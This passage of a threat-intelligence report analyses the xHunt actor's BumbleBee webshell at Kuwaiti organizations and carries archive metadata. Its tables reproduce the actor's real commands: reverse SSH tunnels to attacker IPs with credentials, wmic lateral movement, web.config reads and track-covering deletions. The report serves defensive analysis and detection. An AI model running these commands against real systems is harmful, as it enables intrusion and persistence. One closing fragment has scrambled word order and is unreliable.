While we\r\nknow the actor used the file uploading functionality of a web application to install BumbleBee onto internal IIS\r\nweb servers, we are still unsure if the actor installed BumbleBee on the compromised Exchange server by\r\nexploiting a vulnerability or by moving laterally from another system on the network.\r\nThe actor used BumbleBee to run commands on the compromised servers at the three Kuwaiti organizations,\r\nincluding commands to discover user accounts and other systems on the network, as well as commands to move\r\nlaterally to other systems on the network. Additionally, the actor created SSH tunnels to access systems via RDP\r\nand to access internal web servers from external servers controlled by the actor. The actor used the same username\r\nand password for the SSH tunnels that we observed within the cheat sheet included in the Sakabota tool, which\r\nwas developed and exclusively used by the actor.\r\nThe external servers used by the actor for the SSH tunnels were seen in activity at two of the three Kuwaiti\r\norganizations, which suggests this actor reuses infrastructure when interacting with multiple target networks.\r\nSeveral related domains also resolved to these external servers, suggesting that they are not only used to establish\r\nSSH tunnels, but used more generally for infrastructure across other portions of their operations.\r\nFrom this analysis, we determined that the actor prefers to use VPNs provided by Private Internet Access when\r\ninteracting directly with the targeted networks to conceal their true location. The actor would also switch VPN\r\nservers often while issuing commands on the webshell to make the activity appear to originate in many different\r\ncountries. The actor also used a VPN when logging into compromised email accounts on the Exchange server of\r\nthe Kuwaiti organization, in which they specifically looked for helpdesk-related emails and emails generated by\r\nsecurity alerts. 
The attempts to conceal their location and the focus on viewing emails that might notify\r\nadministrators of the compromised network of the attacker’s presence may explain how the actor was able to\r\nmaintain a presence on the compromised network for many months.\r\nPalo Alto Networks Next-Generation Firewall customers are protected from the attacks outlined in this blog with\r\nthe following security subscriptions:\r\nThreat Prevention signatures “BumbleBee Webshell File Detection” and “BumbleBee Webshell Command\r\nand Control Traffic Detection” detect BumbleBee webshell activity.\r\nActor’s related infrastructure has been categorized as malicious in URL Filtering and DNS Security.\r\nAdditional Resources\r\nxHunt Campaign: Newly Discovered Backdoors Using Deleted Email Drafts and DNS Tunneling for\r\nCommand and Control\r\nxHunt Campaign: New Watering Hole Identified for Credential Harvesting\r\nxHunt Campaign: xHunt Actor’s Cheat Sheet\r\nxHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection\r\nxHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations\r\nAppendix\r\nIndicators of Compromise\r\n142.11.211[.]79\r\n91.92.109[.]59\r\n192.119.110[.]194\r\n192.255.166[.]158\r\nbackendloop[.]online\r\nbestmg[.]info\r\nwindowsmicrosofte[.]online\r\nBumbleBee Webshell Activity on Exchange Server\r\nTable 1. 
Actor activity using BumbleBee webshell on compromised Exchange server.\r\nTable 2. Commands Executed via BumbleBee on Exchange Server\r\nTime (UTC) on 9/16/2020\tCommand Executed\tATT\u0026CK IDs\r\n13:42:12\tping -n 1 -a \u003credacted IP #1\u003e\tT1018\r\n13:42:27\tquser /server:dc.\u003credacted root domain\u003e\tT1087\r\n14:27:39\tipconfig /all\tT1016\r\n14:27:51\tW32tm /query /computer:\u003credacted IP #1\u003e /configuration\tT1124\r\n14:29:06\tW32tm /query /computer:\u003credacted IP #1\u003e /configuration\tT1124\r\n14:34:25\tquser /server:\u003credacted IP #1\u003e\tT1087\r\n14:36:57\techo y | echo q | echo y | echo q | echo y | echo q |echo y | echo q | echo y | echo q | echo y | echo q | time\tT1124\r\n14:37:11\techo y | echo q | echo y | echo q | echo y | echo q |echo y | echo q | echo y | echo q | echo y | echo q | time\tT1124\r\n14:43:34\tquser /server:\u003credacted IP #1\u003e\tT1087\r\n14:43:53\tquser /server:\u003credacted IP #2\u003e\tT1087\r\n14:49:14\tquser /server:\u003credacted IP #1\u003e\tT1087\r\n14:49:33\tquser \u003credacted username #1\u003e /server:\u003credacted hostname #1\u003e\tT1087\r\n15:43:13\tipconfig /all\tT1016\r\n15:43:21\tquser /server:\u003credacted IP #1\u003e\tT1087\r\n15:44:53\tdir c:\\windows\\temp\\*.exe\tT1083\r\n15:45:15\techo y | c:\\windows\\temp\\RTQ.exe 192.119.110[.]194 -C -R 0.0.0.0:8081:\u003credacted IP #2\u003e:3389 -l bor -pw 123321 -P 443\tT1572, T1021.001\r\n15:45:26\twhoami\tT1033\r\n15:45:32\techo y | c:\\windows\\temp\\RTQ.exe 192.119.110[.]194 -C -R 0.0.0.0:8081:\u003credacted IP #2\u003e:3389 -l bor -pw 123321 -P 443\tT1572, T1021.001\r\n15:46:11\tc:\\windows\\temp\\RTQ.exe\tT1059.003\r\n15:46:21\twhoami /priv\tT1033\r\n15:48:15\tnet group \"Domain Computers\" /domain\tT1069\r\n15:48:35\tping -n 1 \u003credacted hostname #2\u003e\tT1018\r\n15:49:30\tnet use \\\u003credacted IP #3\u003e\\C$ /user:\u003credacted domain\u003e\\\u003credacted username #2\u003e \u003credacted password #1\u003e\tT1021.002\r\n15:50:22\tcopy c:\\windows\\temp\\RTQ.exe \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\RTQ.exe\tT1570, T1021.002\r\n15:50:28\t\\\u003credacted IP #3\u003e\\C$\\windows\\temp\\RTQ.exe\tT1059.003, T1021.002\r\n15:51:59\twmic /node:\"\u003credacted IP #3\u003e\" /user:\u003credacted domain\u003e\\\u003credacted username #2\u003e /PASSWORD:\u003credacted password #1\u003e process call create \"cmd.exe /c c:\\windows\\temp\\RTQ.exe \u003e\u003e C:\\windows\\temp\\r.txt\"\tT1047\r\n15:52:22\ttype \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\r.txt\tT1039, T1021.002\r\n15:53:36\twmic /node:\"\u003credacted IP #3\u003e\" /user:\u003credacted domain\u003e\\\u003credacted username #2\u003e /PASSWORD:\u003credacted password #1\u003e process call create \"cmd.exe /c c:\\windows\\temp\\RTQ.exe 192.119.110[.]194 -C -R 0.0.0.0:8082:\u003credacted IP #2\u003e:3389 -l bor -pw 123321 -P 443\"\tT1047, T1572, T1021.001\r\n15:55:14\twmic /node:\"\u003credacted IP #3\u003e\" /user:\u003credacted domain\u003e\\\u003credacted username #2\u003e /PASSWORD:\u003credacted password #1\u003e process call create \"cmd.exe /c c:\\windows\\temp\\RTQ.exe 192.119.110[.]194 -C -R 0.0.0.0:8084:0.0.0.0:3389 -l bor -pw 123321 -P 443\"\tT1047, T1572, T1021.001\r\n15:56:55\tdel \\\u003credacted IP #3\u003e\\C$:\\windows\\temp\\RTQ.exe\tT1070.004, T1021.002\r\n15:57:03\tdel \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\RTQ.exe\tT1070.004, T1021.002\r\n15:57:10\tdel \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\RTQ.exe /F\tT1070.004, T1021.002\r\n15:58:00\twmic /node:\"\u003credacted IP #3\u003e\" /user:\u003credacted domain\u003e\\\u003credacted username #2\u003e /PASSWORD:\u003credacted password #1\u003e process call create \"cmd.exe /c del c:\\windows\\temp\\RTQ.exe /F\"\tT1047, T1070.004\r\n15:58:05\twmic /node:\"\u003credacted IP #3\u003e\" /user:\u003credacted domain\u003e\\\u003credacted username #2\u003e /PASSWORD:\u003credacted password #1\u003e process call create \"cmd.exe /c del c:\\windows\\temp\\RTQ.exe\"\tT1047, T1070.004\r\n15:58:19\tdir \\\u003credacted IP #3\u003e\\C$:\\windows\\temp\\*.exe\tT1083, T1021.002\r\n15:58:25\tdir \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\*.exe\tT1083, T1021.002\r\n15:58:38\tdir \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\r.txt\tT1083, T1021.002\r\n15:58:43\tdel \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\r.txt\tT1070.004, T1021.002\r\n15:59:25\twmic /node:\"\u003credacted IP #3\u003e\" /user:\u003credacted domain\u003e\\\u003credacted username #2\u003e /PASSWORD:\u003credacted password #1\u003e process call create \"cmd.exe /c tasklist \u003e C:\\windows\\temp\\r.txt\"\tT1047\r\n15:59:29\ttype \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\r.txt\tT1039, T1021.002\r\n15:59:48\twmic /node:\"\u003credacted IP #3\u003e\" /user:\u003credacted domain\u003e\\\u003credacted username #2\u003e /PASSWORD:\u003credacted password #1\u003e process call create \"cmd.exe /c taskkill /IM \"RTQ.exe\" /F\"\tT1047\r\n15:59:55\tdir c:\\windows\\temp\\*.exe\tT1083\r\n15:59:58\tdir \\\u003credacted IP #3\u003e\\C$:\\windows\\temp\\*.exe\tT1083, T1021.002\r\n16:00:04\tdir \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\*.exe\tT1083, T1021.002\r\n16:00:09\tdel \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\*.exe\tT1070.004, T1021.002\r\n16:00:14\tdir \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\*.exe\tT1083, T1021.002\r\n16:00:24\tdel \\\u003credacted IP #3\u003e\\C$\\windows\\temp\\r.txt\tT1070.004, T1021.002\r\n16:00:29\tnet use * /DELETE /y\tT1070.004, T1021.002\r\n16:02:48\tpowershell -c \"Test-NetConnection -ComputerName \u003credacted IP #2\u003e -Port 80 -InformationLevel \"Detailed\"\tT1046, T1059.001\r\n16:04:36\tpowershell -c \"Test-NetConnection -ComputerName \u003credacted IP #2\u003e -Port 3389 -InformationLevel \"Detailed\"\tT1046, T1059.001\r\n16:07:23\tpowershell -c \"Test-NetConnection -ComputerName \u003credacted IP #2\u003e -Port 389 -InformationLevel \"Detailed\"\tT1046, T1059.001\r\n16:07:55\tquser /server:\u003credacted IP #1\u003e\tT1087\r\n16:08:42\techo y | c:\\windows\\temp\\RTQ.exe 192.119.110[.]194 -C -R 0.0.0.0:8081:\u003credacted IP #1\u003e:3389 -l bor -pw 123321 -P 443\tT1572, T1021.001\r\n16:09:03\twmic /node:\"127.0.0.1\" /user:administrator /PASSWORD:\"\u003credacted password #2\u003e\" process call create \"cmd.exe /c whoami\"\tT1047, T1033\r\n16:09:15\tipconfig/all\tT1016\r\n16:09:35\twmic /node:\"Exchange\" /user:administrator /PASSWORD:\"\u003credacted password #2\u003e\" process call create \"cmd.exe /c whoami\"\tT1047, T1033\r\n16:10:35\tnet use \\\u003credacted IP #1\u003e\\C$ /user:\u003credacted domain\u003e\\\u003credacted username #2\u003e \u003credacted password #1\u003e\tT1021.002\r\n16:10:45\tquser /server:\u003credacted IP #4\u003e\tT1087\r\n16:13:17\tipconfig/all\tT1016\r\n16:13:27\twmic /node:\"\u003credacted IP #1\u003e\" /user:\u003credacted domain\u003e\\\u003credacted username #2\u003e /PASSWORD:\u003credacted password #1\u003e process call create \"cmd.exe /c c:\\windows\\temp\\RTQ.exe whoami\"\tT1047, T1033\r\n16:14:20\ttype \\\u003credacted IP #1\u003e\\C$\\windows\\temp\\w.txt\tT1039, T1021.002\r\n16:14:30\tdir \\\u003credacted IP #1\u003e\\C$\\windows\\temp\\*.txt\tT1083, T1021.002\r\n16:14:56\twmic /node:\"\u003credacted IP #1\u003e\" /user:\u003credacted domain\u003e\\\u003credacted username #2\u003e /PASSWORD:\u003credacted password #1\u003e process call create \"cmd.exe /c tasklist \u003e c:\\windows\\temp\\ww.txt\"\tT1047\r\n16:15:28\tdir \\\u003credacted IP #1\u003e\\c$\\windows\\temp\\*txt\tT1083, T1021.002\r\n16:15:36\ttype \\\u003credacted IP #1\u003e\\c$\\windows\\temp\\ww.txt\tT1039, T1021.002\r\n16:17:54\tpowershell -c Test-NetConnection -ComputerName \u003credacted IP #1\u003e -Port 3389\tT1046, T1059.001\r\n16:19:28\tpowershell -c Test-NetConnection -ComputerName \u003credacted IP #2\u003e -Port 3389\tT1046, T1059.001\r\n16:19:32\twmic /node:\"\u003credacted IP #1\u003e\" /user:\u003credacted domain\u003e\\\u003credacted username #2\u003e /PASSWORD:\u003credacted password #1\u003e process call create \"cmd /c powershell -c Test-NetConnection -ComputerName \u003credacted IP #2\u003e -Port 3389 \u003e c:\\windows\\temp\\r.txt\"\tT1046, T1047, T1059.001, T1021.001\r\n16:20:00\ttype \\\u003credacted IP #1\u003e\\C$\\windows\\temp\\r.txt\tT1039, T1021.002\r\n16:20:34\tping -n 1 -a \u003credacted IP #2\u003e\tT1018\r\n16:21:29\twmic /node:\"\u003credacted IP #2\u003e\" /user:administrator /PASSWORD:\"\u003credacted password #2\u003e\" process call create \"cmd.exe /c whoami\"\tT1047, T1033\r\n16:22:06\twmic /node:\"\u003credacted IP #2\u003e\" /user:administrator /PASSWORD:\"\u003credacted password #2\u003e\" process call create \"cmd.exe /c whoami\"\tT1047, T1033\r\n16:22:59\tnet use\tT1021.002\r\n16:23:07\tdir \\\u003credacted IP #1\u003e\\C$\\windows\\temp\\*.txt\tT1083, T1021.002\r\n16:23:16\ttype \\\u003credacted IP #1\u003e\\C$\\windows\\temp\\teredo.txt\tT1039, T1021.002\r\n16:23:27\tdel \\\u003credacted IP #1\u003e\\C$\\windows\\temp\\ww.txt\tT1070.004, T1021.002\r\n16:23:29\tdel \\\u003credacted IP 
#1\u003e\\C$\\windows\\temp\\r.txt\r\nT1070.004,\r\nT1021.002\r\n16:23:43 net use * /DELETE /y\r\nT1070.004,\r\nT1021.002\r\n17:21:19 del owafont_ja.aspx /F\r\nT1505.003,\r\nT1070.004\r\nTable 2. Commands the actor ran using BumbleBee webshell on the compromised Exchange server.\r\nCommands Executed via BumbleBee on IIS Web Server\r\nTime\r\nWebshell\r\nFilename\r\nCommand ATT\u0026CK TIDs\r\n9/10/20\r\n20:47:36\r\nShowDoc.aspx\r\nhostname \u0026 whoami \u0026 ipconfig/all \u0026 route print \u0026 arp -\r\na\r\nT1082,\r\nT1033,\r\nT1016\r\n9/10/20\r\n20:48:03\r\nShowDoc.aspx ping -n 1 -a \u003credacted IP\u003e T1018\r\n9/10/20\r\n20:48:20\r\nShowDoc.aspx ping -n 1 -a \u003credacted domain\u003e T1018\r\n9/10/20\r\n20:48:29\r\nShowDoc.aspx net users /domain T1087.002\r\n9/10/20\r\n20:48:33\r\nShowDoc.aspx ipconfig/all T1016\r\n9/10/20\r\n20:49:19\r\nShowDoc.aspx echo %USERDOMAIN% T1016\r\nhttps://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\r\nPage 15 of 17\n\n9/10/20\r\n20:49:27\r\nShowDoc.aspx net users /domain T1087.002\r\n9/10/20\r\n20:49:35\r\nShowDoc.aspx net users T1087.001\r\n9/10/20\r\n20:49:44\r\nShowDoc.aspx net localgroup administrators T1087.001\r\n9/10/20\r\n20:50:16\r\nShowDoc.aspx net view T1135\r\n9/10/20\r\n20:50:21\r\nShowDoc.aspx type ..\\..\\web.config T1005\r\n9/10/20\r\n20:50:40\r\nShowDoc.aspx ** Uploads cq.aspx webshell ** T1505.003\r\n9/10/20\r\n20:51:16\r\ncq.aspx\r\npowershell -C \"$conn=new-object\r\nSystem.Data.SqlClient.SQLConnection(\"\"\"\u003credacted\r\nSQL connection\u003e\"\"\");Try { $conn.Open(); }Catch {\r\ncontinue; }$cmd = new-object\r\nSystem.Data.SqlClient.SqlCommand(\"\"\"select\r\n@@version;\"\"\",$conn);$ds=New-Object\r\nsystem.Data.DataSet;$da=New-Object\r\nsystem.Data.SqlClient.SqlDataAdapter($cmd);\r\n[void]$da.fill($ds);$ds.Tables[0];$conn.Close();\"\r\nT1059.001,\r\nT1213\r\n9/10/20\r\n20:51:37\r\ncq.aspx\r\npowershell -C 
\"$conn=new-object\r\nSystem.Data.SqlClient.SQLConnection(\"\"\"\u003credacted\r\nSQL connection\u003e\"\"\");Try { $conn.Open(); }Catch {\r\ncontinue; }$cmd = new-object\r\nSystem.Data.SqlClient.SqlCommand(\"\"\"\u003credacted SQL\r\nquery\u003e\"\"\",$conn);$ds=New-Object\r\nsystem.Data.DataSet;$da=New-Object\r\nsystem.Data.SqlClient.SqlDataAdapter($cmd);\r\n[void]$da.fill($ds);$ds.Tables[0];$conn.Close();\"\r\nT1059.001,T1213\r\n9/10/20\r\n20:51:45\r\ncq.aspx powershell -C \"$conn=new-object\r\nSystem.Data.SqlClient.SQLConnection(\"\"\"\u003credacted\r\nSQL connection\u003e\"\"\");Try { $conn.Open(); }Catch {\r\ncontinue; }$cmd = new-object\r\nSystem.Data.SqlClient.SqlCommand(\"\"\"\u003credacted SQL\r\nquery\u003e\"\"\",$conn);$ds=New-Object\r\nsystem.Data.DataSet;$da=New-Object\r\nT1059.001,T1213\r\nhttps://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\r\nPage 16 of 17\n\nsystem.Data.SqlClient.SqlDataAdapter($cmd);\r\n[void]$da.fill($ds);$ds.Tables[0];$conn.Close();\"\r\n9/10/20\r\n20:52:27\r\nShowDoc.aspx del cq.aspx T1070.004\r\nTable 3. 
Commands the actor ran using BumbleBee webshell hosted at second Kuwaiti organization.\r\nTable of Contents\r\nExecutive Summary\r\nBumbleBee Webshell\r\nInteractions With Compromised Microsoft Exchange Server\r\nCommands Executed via BumbleBee\r\nFile Uploader and SSH Tunnels\r\nRelated xHunt Infrastructure\r\nConclusion\r\nAdditional Resources\r\nAppendix\r\nRelated Articles\r\nThreat Assessment: Howling Scorpius (Akira Ransomware)\r\nLateral Movement on macOS: Unique and Popular Techniques and In-the-Wild Examples\r\nThreat Brief: ConnectWise ScreenConnect Vulnerabilities (CVE-2024-1708 and CVE-2024-1709)\r\nEnlarged Image\r\nSource: https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\r\nhttps://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\r\nPage 17 of 17\n\nthe actor executed a different external commands IP address that use the same controlled by the username and actor, as in the password as seen following: in the xHunt cheat sheet, but with\n1.exe 142.11.211[.]79 -C-R 0.0.0.0:8080:10.x.x.x:80 -l bor-pw 123321-P 443  \nSVROOT.exe 142.11.211[.]79 -C-R 0.0.0.0:8081:10.x.x.x:80  -l bor-pw 123321 -P 443 \nThese commands differ from those used to create the SSH tunnel on the compromised Exchange server that\nallowed the actor to connect to the server using RDP over TCP port 3389. The commands above attempt to create\na tunnel to allow the actor to access web servers hosted at other internal servers over TCP port 80. We believe the\n   Page 6 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/"
	],
	"report_names": [
		"bumblebee-webshell-xhunt-campaign"
	],
	"threat_actors": [
		{
			"id": "8c8fea8c-c957-4618-99ee-1e188f073a0e",
			"created_at": "2024-02-02T02:00:04.086766Z",
			"updated_at": "2026-04-10T02:00:03.563647Z",
			"deleted_at": null,
			"main_name": "Storm-1567",
			"aliases": [
				"Akira",
				"PUNK SPIDER",
				"GOLD SAHARA"
			],
			"source_name": "MISPGALAXY:Storm-1567",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "910b38e9-07fe-4b47-9cf4-e190a07b1b84",
			"created_at": "2024-04-24T02:00:49.516358Z",
			"updated_at": "2026-04-10T02:00:05.309426Z",
			"deleted_at": null,
			"main_name": "Akira",
			"aliases": [
				"Akira",
				"GOLD SAHARA",
				"PUNK SPIDER",
				"Howling Scorpius"
			],
			"source_name": "MITRE:Akira",
			"tools": [
				"Mimikatz",
				"PsExec",
				"AdFind",
				"Akira _v2",
				"Akira",
				"Megazord",
				"LaZagne",
				"Rclone"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "20bc5b83-9ea0-4e60-a23e-19bf203dc9fb",
			"created_at": "2022-10-25T16:07:24.432777Z",
			"updated_at": "2026-04-10T02:00:04.986077Z",
			"deleted_at": null,
			"main_name": "xHunt",
			"aliases": [
				"Cobalt Katana",
				"Hive0081",
				"Hunter Serpens",
				"SectorD01"
			],
			"source_name": "ETDA:xHunt",
			"tools": [
				"CASHY200",
				"COLDTRAIN",
				"Gon",
				"Hisoka",
				"Killua",
				"Netero",
				"SHELLSTING",
				"Sakabota",
				"Snugy",
				"TriFive"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c5a103eb-08af-410b-b11d-3635f4d4a3eb",
			"created_at": "2025-08-07T02:03:24.756187Z",
			"updated_at": "2026-04-10T02:00:03.667108Z",
			"deleted_at": null,
			"main_name": "COBALT KATANA",
			"aliases": [
				"Hive0081 ",
				"SectorD01 ",
				"xHunt campaign "
			],
			"source_name": "Secureworks:COBALT KATANA",
			"tools": [
				"CASHY200",
				"Diezen",
				"Eye",
				"Gon",
				"Hisoka",
				"Hisoka Netero",
				"HyphenShell",
				"Killua",
				"Sakabota",
				"Sakabota Framework"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434178,
	"ts_updated_at": 1775791902,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6ec2a1f5631f6c6dfc4e1ad3c7de7e90b998a7a5.pdf",
		"text": "https://archive.orkl.eu/6ec2a1f5631f6c6dfc4e1ad3c7de7e90b998a7a5.txt",
		"img": "https://archive.orkl.eu/6ec2a1f5631f6c6dfc4e1ad3c7de7e90b998a7a5.jpg"
	}
}